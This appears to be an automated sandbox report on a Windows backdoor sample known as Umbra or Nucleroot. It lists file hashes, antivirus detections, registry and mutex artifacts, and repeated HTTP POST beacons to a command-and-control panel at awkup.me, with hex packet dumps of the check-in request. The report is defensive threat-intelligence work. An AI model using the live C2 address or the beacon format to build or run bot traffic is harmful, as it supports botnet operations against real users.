Analysis Date2015-02-24 08:57:43
MD5a4f92f2780610d712cf51f33fca27ab5
SHA1bda6c3941b62804fc3793699e3c118189003c836

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6038e45d651757875aa6b07ed86976e2 sha1: dd00e3196288e920b192926598bcda50dfe6a672 size: 41472
Section.itext md5: a69127388ed383cdf3b1d485bbdb26c7 sha1: 0a9c0c1389502edb629a601444e2a4bc7db67d85 size: 512
Section.data md5: 02cda8943676a0fd3e13cfe908fab1e1 sha1: da3a50a6aeb0a91fc9f3132d3c2ebaa7f15c72b2 size: 3584
Section.bss md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 2d1d3ffa7e1d5e9dba6be0e3e6f9524e sha1: 62e840587457737d5e0cfb8eecd6a150e4d3d13f size: 3072
Section.didata md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rdata md5: 3d306159009b4fa0aa7915d2b3ea1bf0 sha1: e001ed6794f1c406df37c0ba8871702f76425830 size: 512
Section.reloc md5: 5e62f413a9f2cf81defc56c10a73026a sha1: 5bc5f551ff891b5af6447f0331c26a6e63661cff size: 5120
Section.rsrc md5: d8cd30fe5dc208f0b8197efece518665 sha1: 2acae7baab16d2f25de8d4945bc78bf706e94b6a size: 36352
Timestamp2012-07-14 12:11:05
PackerBobSoft Mini Delphi -> BoB / BobSoft
PEhash4e9ffcef24834fd550f0209bbd98454c6eddef75
IMPhash4eb9d67d7eb64a8b56e4c4b754e56925
AV360 Safeno_virus
AVAd-AwareGen:Variant.Graftor.127004
AVAlwil (avast)Malware-gen:Delf-SFQ [Trj]:Win32:Malware-gen
AVArcabit (arcavir)Gen:Variant.Graftor.127004:Worm.Generic.380883
AVAuthentiumno_virus
AVAvira (antivir)TR/ATRAPS.Gen
AVBullGuardGen:Variant.Graftor.127004
AVCA (E-Trust Ino)Win32/Tnega.ANRR
AVCAT (quickheal)Backdoor.Nucleroot.ks
AVClamAVWIN.Trojan.Nucleroot-1
AVDr. WebBackDoor.Umbra.17
AVEmsisoftGen:Variant.Graftor.127004
AVEset (nod32)Win32/Delf.OGJ
AVFortinetW32/Delf.OGJ!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Graftor.127004
AVGrisoft (avg)Delf.AGLM
AVIkarusBackdoor.Win32.Nucleroot
AVK7Trojan ( 7000000f1 )
AVKasperskyBackdoor.Win32.Nucleroot.ks
AVMalwareBytesTrojan.Delf
AVMcafeeW32/Generic.Delphi.b
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Umbald.A
AVMicroWorld (escan)Gen:Variant.Graftor.127004
AVRisingTrojan.Agent!4F69
AVSophosno_virus
AVSymantecno_virus
AVTrend MicroTROJ_UMBALD.AC
AVVirusBlokAda (vba32)Backdoor.Nucleroot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\slayer616wasd\UID ➝
{CE4032B9-95D9-48D4-AAD4-BA1B0AA5192C}
Creates MutexDBWinMutex
Creates Mutexslayer616wasd

Network Details:

DNSawkup.me
Type: A
46.30.212.66
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
HTTP POSThttp://awkup.me/Panel/Panel/bot.php
User-Agent: umbra
Flows TCP192.168.1.1:1031 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1032 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1033 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1034 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1035 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1036 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1037 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1038 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1039 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1040 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1041 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1042 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1043 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1044 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1045 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1046 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1047 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1048 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1049 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1050 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1051 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1052 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1053 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1054 ➝ 46.30.212.66:80
Flows TCP192.168.1.1:1055 ➝ 46.30.212.66:80

Raw Pcap
0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
0x00000070 (00112)   6b75702e 6d650d0a 436f6e74 656e742d   kup.me..Content-
0x00000080 (00128)   4c656e67 74683a20 35350d0a 43616368   Length: 55..Cach
0x00000090 (00144)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000a0 (00160)   6368650d 0a0d0a6d 6f64653d 32265549   che....mode=2&UI
0x000000b0 (00176)   443d3742 34333435 33343330 33333332   D=7B434534303332
0x000000c0 (00192)   34323339 32443339 33353434 33393244   42392D393544392D
0x000000d0 (00208)   26766572 73696f6e 3d312e32 2e30       &version=1.2.0

0x00000000 (00000)   504f5354 202f5061 6e656c2f 50616e65   POST /Panel/Pane
0x00000010 (00016)   6c2f626f 742e7068 70204854 54502f31   l/bot.php HTTP/1
0x00000020 (00032)   2e310d0a 436f6e74 656e742d 54797065   .1..Content-Type
0x00000030 (00048)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000040 (00064)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000050 (00080)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000060 (00096)   20756d62 72610d0a 486f7374 3a206177    umbra..Host: aw
